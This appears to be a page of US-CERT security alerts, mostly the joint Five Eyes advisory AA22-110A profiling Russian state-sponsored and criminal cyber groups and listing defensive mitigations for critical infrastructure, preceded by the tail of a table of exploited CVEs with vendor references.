UI for ASP.NET AJAX through 2019.3.1023

Telerik UI for ASP.NET AJAX Allows JavaScriptSerializer Deserialization

ACSC Alert Active exploitation of vulnerability in Microsoft Internet Information Services

 

CVE-2019-11510

Pulse Secure

Pulse Connect Secure 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4

Pulse Secure: SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX

CISA Alert Continued Exploitation of Pulse Secure VPN Vulnerability

CISA Alert Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity

ACSC Advisory Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software

Joint CSA APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations

CCCS Alert APT Actors Target U.S. and Allied Networks - Update 1

CVE-2018-13379

Fortinet

FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6

Fortinet FortiGuard Labs: FG-IR-20-233

Joint CSA Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology

Joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities

Joint CSA APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations

ACSC Alert APT exploitation of Fortinet Vulnerabilities

CCCS Alert Exploitation of Fortinet FortiOS vulnerabilities (CISA, FBI) - Update 1

CVE-2018-0171

Cisco

See Cisco Security Advisory: cisco-sa-20180328-smi2

Cisco Security Advisory: cisco-sa-20180328-smi2

CCCS Action Required to Secure the Cisco IOS and IOS XE Smart Install Feature

CVE-2017-11882

Microsoft

Office, multiple versions; see Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882

Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882

CCCS Alert Microsoft Office Security Update

CVE-2017-0199

Microsoft

Multiple products; see Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199

Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199

CCCS Microsoft Security Updates

Contact Information

U.S. organizations: all organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov. Australian organizations: visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca. New Zealand organizations: report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654. United Kingdom organizations: report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

Revisions
  • April 27, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-110A: Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure

US-CERT Security Alerts - Wed, 04/20/2022 - 09:00
Original release date: April 20, 2022 | Last revised: May 9, 2022
Summary

Actions critical infrastructure organizations should implement to immediately protect against Russian state-sponsored and criminal cyber threats:
• Patch all systems. Prioritize patching known exploited vulnerabilities.
• Enforce multifactor authentication.
• Secure and monitor Remote Desktop Protocol and other risky services.
• Provide end-user awareness and training.

The cybersecurity authorities of the United States[1][2][3], Australia[4], Canada[5], New Zealand[6], and the United Kingdom[7][8] are releasing this joint Cybersecurity Advisory (CSA). The intent of this joint CSA is to warn organizations that Russia’s invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity. This activity may occur as a response to the unprecedented economic costs imposed on Russia as well as materiel support provided by the United States and U.S. allies and partners.

Evolving intelligence indicates that the Russian government is exploring options for potential cyberattacks (see the March 21, 2022, Statement by U.S. President Biden for more information). Recent Russian state-sponsored cyber operations have included distributed denial-of-service (DDoS) attacks, and older operations have included deployment of destructive malware against Ukrainian government and critical infrastructure organizations

Additionally, some cybercrime groups have recently publicly pledged support for the Russian government. These Russian-aligned cybercrime groups have threatened to conduct cyber operations in retaliation for perceived cyber offensives against the Russian government or the Russian people. Some groups have also threatened to conduct cyber operations against countries and organizations providing materiel support to Ukraine. Other cybercrime groups have recently conducted disruptive attacks against Ukrainian websites, likely in support of the Russian military offensive.

This advisory updates joint CSA Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure, which provides an overview of Russian state-sponsored cyber operations and commonly observed tactics, techniques, and procedures (TTPs). This CSA—coauthored by U.S., Australian, Canadian, New Zealand, and UK cyber authorities with contributions from industry members of the Joint Cyber Defense Collaborative (JCDC)—provides an overview of Russian state-sponsored advanced persistent threat (APT) groups, Russian-aligned cyber threat groups, and Russian-aligned cybercrime groups to help the cybersecurity community protect against possible cyber threats.

U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities urge critical infrastructure network defenders to prepare for and mitigate potential cyber threats—including destructive malware, ransomware, DDoS attacks, and cyber espionage—by hardening their cyber defenses and performing due diligence in identifying indicators of malicious activity. Refer to the Mitigations section of this advisory for recommended hardening actions.

For more information on Russian state-sponsored cyber activity, see CISA’s Russia Cyber Threat Overview and Advisories webpage. For more information on the heightened cyber threat to critical infrastructure organizations, see the following resources:

Click here for a PDF version of this report.

Technical DetailsRussian State-Sponsored Cyber Operations

Russian state-sponsored cyber actors have demonstrated capabilities to compromise IT networks; develop mechanisms to maintain long-term, persistent access to IT networks; exfiltrate sensitive data from IT and operational technology (OT) networks; and disrupt critical industrial control systems (ICS)/OT functions by deploying destructive malware. 
Historical operations have included deployment of destructive malware—including BlackEnergy and NotPetya—against Ukrainian government and critical infrastructure organizations. Recent Russian state-sponsored cyber operations have included DDoS attacks against Ukrainian organizations. Note: for more information on Russian state-sponsored cyber activity, including known TTPs, see joint CSA Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure

Cyber threat actors from the following Russian government and military organizations have conducted malicious cyber operations against IT and/or OT networks:

  • The Russian Federal Security Service (FSB), including FSB’s Center 16 and Center 18
  • Russian Foreign Intelligence Service (SVR)
  • Russian General Staff Main Intelligence Directorate (GRU), 85th Main Special Service Center (GTsSS)
  • GRU’s Main Center for Special Technologies (GTsST)
  • Russian Ministry of Defense, Central Scientific Institute of Chemistry and Mechanics (TsNIIKhM)
The Russian Federal Security Service

Overview: FSB, the KGB’s successor agency, has conducted malicious cyber operations targeting the Energy Sector, including UK and U.S. energy companies, U.S. aviation organizations, U.S. government and military personnel, private organizations, cybersecurity companies, and journalists. FSB has been known to task criminal hackers for espionage-focused cyber activity; these same hackers have separately been responsible for disruptive ransomware and phishing campaigns.

Industry reporting identifies three intrusion sets associated with the FSB, but the U.S. and UK governments have only formally attributed one of these sets—known as BERSERK BEAR—to FSB.

  • BERSERK BEAR (also known as Crouching Yeti, Dragonfly, Energetic Bear, and Temp.Isotope) has, according to industry reporting, historically targeted entities in Western Europe and North America including state, local, tribal, and territorial (SLTT) organizations, as well as Energy, Transportation Systems, and Defense Industrial Base (DIB) Sector organizations. This group has also targeted the Water and Wastewater Systems Sector and other critical infrastructure facilities. Common TTPs include scanning to exploit internet-facing infrastructure and network appliances, conducting brute force attacks against public-facing web applications, and leveraging compromised infrastructure—often websites frequented or owned by their target—for Windows New Technology Local Area Network Manager (NTLM) credential theft. Industry reporting assesses that this actor has a destructive mandate.

The U.S. and UK governments assess that this APT group is almost certainly FSB’s Center 16, or Military Unit 71330, and that FSB’s Center 16 has conducted cyber operations against critical IT systems and infrastructure in Europe, the Americas, and Asia. 

Resources: for more information on BERSERK BEAR, see the MITRE ATT&CK® webpage on Dragonfly.

High-Profile Activity: in 2017, FSB employees, including one employee in the FSB Center for Information Security (also known as Unit 64829 and Center 18), were indicted by the U.S. Department of Justice (DOJ) for accessing email accounts of U.S. government and military personnel, private organizations, and cybersecurity companies, as well as email accounts of journalists critical of the Russian government.[9] More recently, in 2021, FSB Center 16 officers were indicted by the U.S. DOJ for their involvement in a multi-stage campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data. One of the victims was a U.S. nuclear power plant.[10

Resources: for more information on FSB, see: 

Russian Foreign Intelligence Service

Overview: SVR has operated an APT group since at least 2008 that has targeted multiple critical infrastructure organizations. SVR cyber threat actors have used a range of initial exploitation techniques that vary in sophistication coupled with stealthy intrusion tradecraft within compromised networks. SVR cyber actors’ novel tooling and techniques include:

  • Custom, sophisticated multi-platform malware targeting Windows and Linux systems (e.g., GoldMax and TrailBlazer); and
  • Lateral movement via the “credential hopping” technique, which includes browser cookie theft to bypass multifactor authentication (MFA) on privileged cloud accounts.[11]

High-Profile Activity: the U.S. Government, the Government of Canada, and the UK Government assess that SVR cyber threat actors were responsible for the SolarWinds Orion supply chain compromise and the associated campaign that affected U.S. government agencies, critical infrastructure entities, and private sector organizations.[12][13][14]

Also known as: APT29, COZY BEAR, CozyDuke, Dark Halo, The Dukes, NOBELIUM, and NobleBaron, StellarParticle, UNC2452, YTTRIUM [15]

Resources: for more information on SVR, see:

For more information on the SolarWinds Orion supply chain compromise, see:

GRU, 85th Main Special Service Center

Overview: GTsSS, or Unit 26165, is an APT group that has operated since at least 2004 and primarily targets government organizations, travel and hospitality entities, research institutions, and non-governmental organizations, in addition to other critical infrastructure organizations. 

According to industry reporting, GTsSS cyber actors frequently collect credentials to gain initial access to target organizations. GTsSS actors have collected victim credentials by sending spearphishing emails that appear to be legitimate security alerts from the victim’s email provider and include hyperlinks leading to spoofed popular webmail services’ logon pages. GTsSS actors have also registered domains to conduct credential harvesting operations. These domains mimic popular international social media platforms and masquerade as tourism- and sports-related entities and music and video streaming services.

High-Profile Activity: the U.S. Government assesses that GTsSS cyber actors have deployed Drovorub malware against victim devices as part of their cyber espionage operations.[16] The U.S. Government and UK Government assess that GTsSS actors used a Kubernetes® cluster to conduct widespread, distributed, and anonymized brute force access attempts against hundreds of government and private sector targets worldwide.[17

Also known as: APT28, FANCY BEAR, Group 74, IRON TWILIGHT, PawnStorm, Sednit, SNAKEMACKEREL, Sofacy, STRONTIUM, Swallowtail, TG-4127, Threat Group-4127, and Tsar Team [18]

Resources: for more information on GTsSS, see the MITRE ATT&CK webpage on APT28

GRU’s Main Center of Special Technologies

Overview: GTsST, or Unit 74455, is an APT group that has operated since at least 2009 and has targeted a variety of critical infrastructure organizations, including those in the Energy, Transportation Systems, and Financial Services Sectors. According to industry reporting, GTsST also has an extensive history of conducting cyber espionage as well as destructive and disruptive operations against NATO member states, Western government and military organizations, and critical infrastructure-related organizations, including in the Energy Sector.

The primary distinguishing characteristic of the group is its operations use techniques aimed at causing disruptive or destructive effects at targeted organizations using DDoS attacks or wiper malware. The group’s destructive operations have also leveraged wiper malware that mimics ransomware or hacktivism and can result in collateral effects to organizations beyond the primary intended targets. Some of their disruptive operations have shown disregard or ignorance of potential secondary or tertiary effects. 

High-Profile Activity: the malicious activity below has been previously attributed to GTsST by the U.S. Government and the UK Government.[19][20]

The U.S. Government, the Government of Canada, and UK Government have also attributed the October 2019 large-scale, disruptive cyber operations against a range of Georgian web hosting providers to GTsST. This activity resulted in websites—including sites belonging to the Georgian government, courts, non-government organizations (NGOs), media, and businesses—being defaced and interrupted the service of several national broadcasters.[21]22][23]

Also known as: ELECTRUM, IRON VIKING, Quedagh, the Sandworm Team, Telebots, VOODOO BEAR [24]

Resources: for more information on GTsST, see the MITRE ATT&CK webpage on Sandworm Team

Russian Ministry of Defense, Central Scientific Institute of Chemistry and Mechanics 

Overview: TsNIIKhM, as described on their webpage, is a research organization under Russia’s Ministry of Defense (MOD). Actors associated with TsNIIKhM have developed destructive ICS malware.

High-Profile Activity: TsNIIKhM has been sanctioned by the U.S. Department of the Treasury for connections to the destructive Triton malware (also called HatMan and TRISIS); TsNIIKhM has been sanctioned by the UK Foreign, Commonwealth, and Development Office (FCDO) for a 2017 incident that involved safety override controls (with Triton malware) in a foreign oil refinery.[25][26] In 2021, the U.S. DOJ indicted a TsNIIKhM Applied Development Center (ADC) employee for conducting computer intrusions against U.S. Energy Sector organizations. The indicted employee also accessed the systems of a foreign oil refinery and deployed Triton malware.[27] Triton is a custom-built malware designed to manipulate safety instrumented systems within ICS controllers, disabling the safety alarms that prevent dangerous conditions. 

Also known as: Temp.Veles, XENOTIME [28]

Resources: for more information on TsNIIKhM, see the MITRE ATT&CK webpage on TEMP.Veles. For more information on Triton, see:

Russian-Aligned Cyber Threat Groups

In addition to the APT groups identified in the Russian State-Sponsored Cyber Operations section, industry reporting identifies two intrusion sets—PRIMITIVE BEAR and VENOMOUS BEAR—as state-sponsored APT groups, but U.S., Australian, Canadian, New Zealand, and UK cyber authorities have not attributed these groups to the Russian government.

  • PRIMITIVE BEAR has, according to industry reporting, targeted Ukrainian organizations since at least 2013. This activity includes targeting Ukrainian government, military, and law enforcement entities using high-volume spearphishing campaigns to deliver its custom malware. According to industry reporting, PRIMITIVE BEAR conducted multiple cyber operations targeting Ukrainian organizations in the lead up to Russia’s invasion.

Resources: for more information on PRIMITIVE BEAR, see the MITRE ATT&CK webpage on the Gamaredon Group.

  • VENOMOUS BEAR has, according to industry reporting, historically targeted governments aligned with the North Atlantic Treaty Organization (NATO), defense contractors, and other organizations of intelligence value. Venomous Bear is known for its unique use of hijacked satellite internet connections for command and control (C2). It is also known for the hijacking of other non-Russian state-sponsored APT actor infrastructure.[29] VENOMOUS BEAR has also historically leveraged compromised infrastructure and maintained an arsenal of custom-developed sophisticated malware families, which is extremely complex and interoperable with variants developed over time. VENOMOUS BEAR has developed tools for multiple platforms, including Windows, Mac, and Linux.[30

Resources: for more information on VENOMOUS BEAR, see the MITRE ATT&CK webpage on Turla.

Russian-Aligned Cybercrime Groups

Cybercrime groups are typically financially motivated cyber actors that seek to exploit human or security vulnerabilities to enable direct theft of money (e.g., by obtaining bank login information) or by extorting money from victims. These groups pose consistent threats to critical infrastructure organizations globally. 

Since Russia’s invasion of Ukraine in February 2022, some cybercrime groups have independently publicly pledged support for the Russian government or the Russian people and/or threatened to conduct cyber operations to retaliate against perceived attacks against Russia or materiel support for Ukraine. These Russian-aligned cybercrime groups likely pose a threat to critical infrastructure organizations primarily through:

  • Deploying ransomware through which cyber actors remove victim access to data (usually via encryption), potentially causing significant disruption to operations.
  • Conducting DDoS attacks against websites. 
    • In a DDoS attack, the cyber actor generates enough requests to flood and overload the target page and stop it from responding. 
    • DDoS attacks are often accompanied by extortion. 
    • According to industry reporting, some cybercrime groups have recently carried out DDoS attacks against Ukrainian defense organizations, and one group claimed credit for DDoS attack against a U.S. airport the actors perceived as supporting Ukraine (see the Killnet section).

Based on industry and open-source reporting, U.S., Australian, Canadian, New Zealand, and UK cyber authorities assess multiple Russian-aligned cybercrime groups pose a threat to critical infrastructure organizations. These groups include:

  • The CoomingProject
  • Killnet
  • MUMMY SPIDER 
  • SALTY SPIDER
  • SCULLY SPIDER
  • SMOKEY SPIDER
  • WIZARD SPIDER
  • The Xaknet Team

Note: although some cybercrime groups may conduct cyber operations in support of the Russian government, U.S., Australian, Canadian, New Zealand, and UK cyber authorities assess that cyber criminals will most likely continue to operate primarily based on financial motivations, which may include targeting government and critical infrastructure organizations.

The CoomingProject

Overview: the CoomingProject is a criminal group that extorts money from victims by exposing or threatening to expose leaked data. Their data leak site was launched in August 2021.[31] The CoomingProject stated they would support the Russian Government in response to perceived cyberattacks against Russia.[32]

Killnet

Overview: according to open-source reporting, Killnet released a video pledging support to Russia.[33
Victims: Killnet claimed credit for carrying out a DDoS attack against a U.S. airport in March 2022 in response to U.S. materiel support for Ukraine.[34]

MUMMY SPIDER

Overview: MUMMY SPIDER is a cybercrime group that creates, distributes, and operates the Emotet botnet. Emotet is advanced, modular malware that originated as a banking trojan (malware designed to steal information from banking systems but that may also be used to drop additional malware and ransomware). Today Emotet primarily functions as a downloader and distribution service for other cybercrime groups. Emotet has been used to deploy WIZARD SPIDER’s TrickBot, which is often a precursor to ransomware delivery. Emotet has worm-like features that enable rapid spreading in an infected network. 

Victims: according to open sources, Emotet has been used to target industries worldwide, including financial, e-commerce, healthcare, academia, government, and technology organizations’ networks.

Also known as: Gold Crestwood, TA542, TEMP.Mixmaster, UNC3443

Resources: for more information on Emotet, see joint Alert Emotet Malware. For more information on TrickBot, see joint CSA TrickBot Malware

SALTY SPIDER

Overview: SALTY SPIDER is a cybercrime group that develops and operates the Sality botnet. Sality is a polymorphic file infector that was discovered in 2003; since then, it has been replaced by more advanced peer-to-peer (P2P) malware loaders.[35]

Victims: according to industry reporting, in February 2022, SALTY SPIDER conducted DDoS attacks against Ukrainian web forums used to discuss events relating to Russia’s military offensive against the city of Kharkiv.

Also known as: Sality

SCULLY SPIDER

Overview: SCULLY SPIDER is a cybercrime group that operates using a malware-as-a-service model; SCULLY SPIDER maintains command and control infrastructure and sells access to their malware and infrastructure to affiliates, who distribute their own malware.[36][37] SCULLY SPIDER develops and operates the DanaBot botnet, which originated primarily as a banking Trojan but expanded beyond banking in 2021 and has since been used to facilitate access for other types of malware, including TrickBot, DoppelDridex, and Zloader. Like Emotet, Danabot effectively functions as an initial access vector for other malware, which can result in ransomware deployment.

According to industry reporting, recent DDoS activity by the DanaBot botnet suggests SCULLY SPIDER has operated in support of Russia’s military offensive in Ukraine. 

Victims: SCULLY SPIDER affiliates have primarily targeted organizations in the United States, Canada, Germany, United Kingdom, Australia, Italy, Poland, Mexico, and Ukraine.[38] According to industry reporting, in March 2022, Danabot was used in DDoS attacks against multiple Ukrainian government organizations. 

Also known as: Gold Opera

SMOKEY SPIDER

Overview: SMOKEY SPIDER is a cybercrime group that develops Smoke Loader (also known as Smoke Bot), a malicious bot that is used to upload other malware. Smoke Loader has been available since at least 2011, and operates as a malware distribution service for a number of different payloads, including—but not limited to—DanaBot, TrickBot, and Qakbot.

Victims: according to industry reporting, Smoke Loader was observed in March 2022 distributing DanaBot payloads that were subsequently used in DDoS attacks against Ukrainian targets.
Resources: for more information on Smoke Loader, see the MITRE ATT&CK webpage on Smoke Loader.

WIZARD SPIDER

Overview: WIZARD SPIDER is a cybercrime group that develops TrickBot malware and Conti ransomware. Historically, the group has paid a wage to the ransomware deployers (referred to as affiliates), some of whom may then receive a share of the proceeds from a successful ransomware attack. In addition to TrickBot, notable initial access and persistence vectors for affiliated actors include Emotet, Cobalt Strike, spearphishing, and stolen or weak Remote Desktop Protocol (RDP) credentials.

After obtaining access, WIZARD SPIDER affiliated actors have relied on various publicly available and otherwise legitimate tools to facilitate earlier stages of the attack lifecycle before deploying Conti ransomware.

WIZARD SPIDER pledged support to the Russian government and threatened critical infrastructure organizations of countries perceived to carry out cyberattacks or war against the Russian government.[39] They later revised this pledge and threatened to retaliate against perceived attacks against the Russian people.[40]

Victims: Conti victim organizations span across multiple industries, including construction and engineering, legal and professional services, manufacturing, and retail. In addition, WIZARD SPIDER affiliates have deployed Conti ransomware against U.S. healthcare and first responder networks.

Also known as: UNC2727, Gold Ulrick

Resources: for more information on Conti, see joint CSA Conti Ransomware. For more information on TrickBot, see joint CSA TrickBot Malware

The XakNet Team

Overview: XakNet is a Russian-language cyber group that has been active as early as March 2022. According to open-source reporting, the XakNet Team threatened to target Ukrainian organizations in response to perceived DDoS or other attacks against Russia.[41] According to reporting from industry, on March 31, 2022, XakNet released a statement stating they would work “exclusively for the good of [Russia].” According to industry reporting, the XakNet Team may be working with or associated with Killnet actors, who claimed credit for the DDoS attacks against a U.S. airport (see the Killnet section).

Victims: according to industry reporting, in late March 2022, the XakNet Team leaked email contents of a Ukrainian government official. The leak was accompanied by a political statement criticizing the Ukrainian government, suggesting the leak was politically motivated. 

Mitigations

U.S., Australian, Canadian, New Zealand, and UK cyber authorities urge critical infrastructure organizations to prepare for and mitigate potential cyber threats by immediately (1) updating software, (2) enforcing MFA, (3) securing and monitoring RDP and other potentially risky services, and (4) providing end-user awareness and training.

  • Update software, including operating systems, applications, and firmware, on IT network assets. Prioritize patching known exploited vulnerabilities and critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment.
    • Consider using a centralized patch management system. For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.  
    • Consider signing up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats. CISA’s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IP addresses for accessible services and vulnerabilities.
  • Enforce MFA to the greatest extent possible and require accounts with password logins, including service accounts, to have strong passwords. Do not allow passwords to be used across multiple accounts or stored on a system to which an adversary may have access. As Russian state-sponsored APT actors have demonstrated the ability to exploit default MFA protocols and known vulnerabilities, organizations should review configuration policies to protect against “fail open” and re-enrollment scenarios. For more information, see joint CSA Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability.
  • If you use RDP and/or other potentially risky services, secure and monitor them closely. RDP exploitation is one of the top initial infection vectors for ransomware, and risky services, including RDP, can allow unauthorized access to your session using an on-path attacker.
    • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN) or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force attempts, log RDP login attempts, and disable unused remote access/RDP ports.
    • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389). 
  • Provide end-user awareness and training to help prevent successful targeted social engineering and spearphishing campaigns. Phishing is one of the top infection vectors for ransomware, and Russian state-sponsored APT actors have conducted successful spearphishing campaigns to gain credentials of target networks.
    • Ensure that employees are aware of potential cyber threats and delivery methods. 
    • Ensure that employees are aware of what to do and whom to contact when they receive a suspected phishing email or suspect a cyber incident.

As part of a longer-term effort, implement network segmentation to separate network segments based on role and functionality. Network segmentation can help prevent the spread of ransomware and threat actor lateral movement by controlling traffic flows between—and access to—various subnetworks.

  • Ensure OT assets are not externally accessible. Ensure strong identity and access management when OT assets needs to be externally accessible.
  • Appropriately implement network segmentation between IT and OT networks. Network segmentation limits the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone that eliminates unregulated communication between the IT and OT networks.
  • Organize OT assets into logical zones by considering criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to filter network traffic and monitor communications between zones. Prohibit ICS protocols from traversing the IT network.

To further prepare for and mitigate cyber threats from Russian state-sponsored or criminal actors, U.S., Australian, Canadian, New Zealand, and UK cyber authorities encourage critical infrastructure organizations to implement the recommendations listed below.

Preparing for Cyber Incidents
  • Create, maintain, and exercise a cyber incident response and continuity of operations plan. 
    • Ensure the cyber incident response plan contains ransomware- and DDoS-specific annexes. For information on preparing for DDoS attacks, see NCSC-UK guidance on preparing for denial-of-service attacks.
    • Keep hard copies of the incident response plan to ensure responders and network defenders can access the plan if the network has been shut down by ransomware, etc.
  • Maintain offline (i.e., physically disconnected) backups of data. Backup procedures should be conducted on a frequent, regular basis (at a minimum every 90 days). Regularly test backup procedures and ensure that backups are isolated from network connections that could enable the spread of malware.
    • Ensure the backup keys are kept offline as well, to prevent them being encrypted in a ransomware incident.
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure with a particular focus on key data assets.
  • Develop recovery documentation that includes configuration settings for common devices and critical equipment. Such documentation can enable more efficient recovery following an incident.
  • Identify the attack surface by mapping and accounting all external-facing assets (applications, servers, IP addresses) that are vulnerable to DDoS attacks or other cyber operations.
  • For OT assets/networks:
    • Identify a resilience plan that addresses how to operate if you lose access to—or control of—the IT and/or OT environment.
    • Identify OT and IT network interdependencies and develop workarounds or manual controls to ensure ICS networks can be isolated from IT networks if the connections create risk to the safe and reliable operation of OT processes. Regularly test contingency plans, such as manual controls, so that safety-critical functions can be maintained during a cyber incident. Ensure that the OT network can operate at necessary capacity even if the IT network is compromised.
    • Regularly test manual controls so that critical functions can be kept running if ICS or OT networks need to be taken offline.
    • Implement data backup procedures.
    • Develop recovery documents that include configuration settings for common devices and critical OT equipment. 
Identity and Access Management
  • Require accounts with password logins, including service accounts, to have strong passwords and do not allow passwords to be used across multiple accounts or stored on a system to which an adversary may have access. Consider using a password manager; see NCSC-UK’s Password Manager Buyers Guide for guidance.
  • Implement authentication timeout and lockout features to prevent repeated failed login attempts and successful brute-force attempts.
  • Create a deny list of known compromised credentials and prevent users from using known-compromised passwords.
  • Secure credentials by restricting where accounts and credentials can be used and by using local device credential protection features. Russian state-sponsored APT actors have demonstrated their ability to maintain persistence using compromised credentials.
    • Use virtualizing solutions on modern hardware and software to ensure credentials are securely stored.
    • Ensure storage of clear text passwords in Local Security Authority Subsystem Service (LSASS) memory is disabled. Note: for Windows 8, this is enabled by default. For more information see Microsoft Security Advisory Update to Improve Credentials Protection and Management.
    • Consider disabling or limiting NTLM and WDigest Authentication.
    • Implement Credential Guard for Windows 10 and Server 2016 (refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).
    • Minimize the Active Directory (AD) attack surface to reduce malicious ticket-granting activity. Malicious activity such as “Kerberoasting” takes advantage of Kerberos’ Ticket Granting Service (TGS) and can be used to obtain hashed credentials that malicious cyber actors attempt to crack.
  • Audit domain controllers to log successful Kerberos TGS requests and ensure the events are monitored for anomalous activity.  
    • Secure accounts.
    • Enforce the principle of least privilege. Administrator accounts should have the minimum permission necessary to complete their tasks.
    • Ensure there are unique and distinct administrative accounts for each set of administrative tasks.
    • Create non-privileged accounts for privileged users and ensure they use the non-privileged accounts for all non-privileged access (e.g., web browsing, email access).
  • Disable inactive accounts uniformly across the AD, MFA systems, etc.
  • Implement time-based access for privileged accounts. The FBI and CISA observed cybercriminals conducting increasingly impactful attacks against U.S. entities on holidays and weekends in 2021. Threat actors may view holidays and weekends—when offices are normally closed—as attractive timeframes, as there are fewer network defenders and IT support personnel at victim organizations. The just-in-time access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the zero-trust model) by setting network-wide policy to automatically disable admin accounts at the AD level. As needed, individual users can submit requests through an automated process that enables access to a system for a set timeframe. 
Protective Controls and Architecture
  • Identify, detect, and investigate abnormal activity that may indicate lateral movement by a threat actor, ransomware, or other malware. Use network monitoring tools and host-based logs and monitoring tools, such as an endpoint detection and response (EDR) tool. EDR tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
  • Implement a firewall and configure it to block Domain Name System (DNS) responses from outside the enterprise network or drop Internet Control Message Protocol (ICMP) packets. Review which admin services need to be accessible externally and allow those explicitly, blocking all others by default.
    • U.S. Defense Industrial Base organizations may sign up for the NSA Cybersecurity Collaboration Center’s Protective Domain Name System (PDNS) services.
  • Enable web application firewalls to mitigate application-level DDoS attacks. 
  • Implement a multi-content delivery network (CDN) solution. This will minimize the threat of DDoS attacks by distributing and balancing web traffic across a network.
Vulnerability and Configuration Management
  • Use an antivirus programs that uses heuristics and reputational ratings to check a file’s prevalence and digital signature prior to execution. Note: organizations should assess the risks inherent in their software supply chain (including its security/antivirus software supply chain) in light of the existing threat landscape.
    • Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures. 
    • Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.
  • Implement rigorous configuration management programs. Ensure the programs can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses.
  • Disable all unnecessary ports and protocols.
    • Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for command and control activity.
    • Turn off or disable any unnecessary services (e.g., PowerShell) or functionality within devices.
  • Identify business-to-business VPNs and block high-risk protocols.
  • Ensure OT hardware is in read-only mode.
  • Enable strong spam filters.
    • Enable strong spam filters to prevent phishing emails from reaching end users.
    • Filter emails containing executable files to prevent them from reaching end users.
    • Implement a user training program to discourage users from visiting malicious websites or opening malicious attachments.
  • Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
  • Open document readers in protected viewing modes to help prevent active content from running.
Responding to Cyber Incidents

U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities urge network defenders of critical infrastructure organizations to exercise due diligence in identifying indicators of malicious activity. Organizations detecting potential APT or ransomware activity in their IT or OT networks should:

  1. Immediately isolate affected systems.
  2. For DDoS attacks:
    1. Identify the source address originating the attack via the SIEM or logging service. If the attack is originating from a single pool of IP addresses, block IP traffic from suspected IPs via access control lists or by contacting your internet service provider (ISP).
    2. Enable firewall rate limiting to restrict the amount of IP traffic coming in from suspected IP addresses
    3. Notify your ISP and enable remote triggered blackhole (RTBH).
  3. Secure backups. Ensure your backup data is offline and secure. If possible, scan your backup data with an antivirus program to ensure it is free of malware.
  4. Collect and review relevant logs, data, and artifacts.
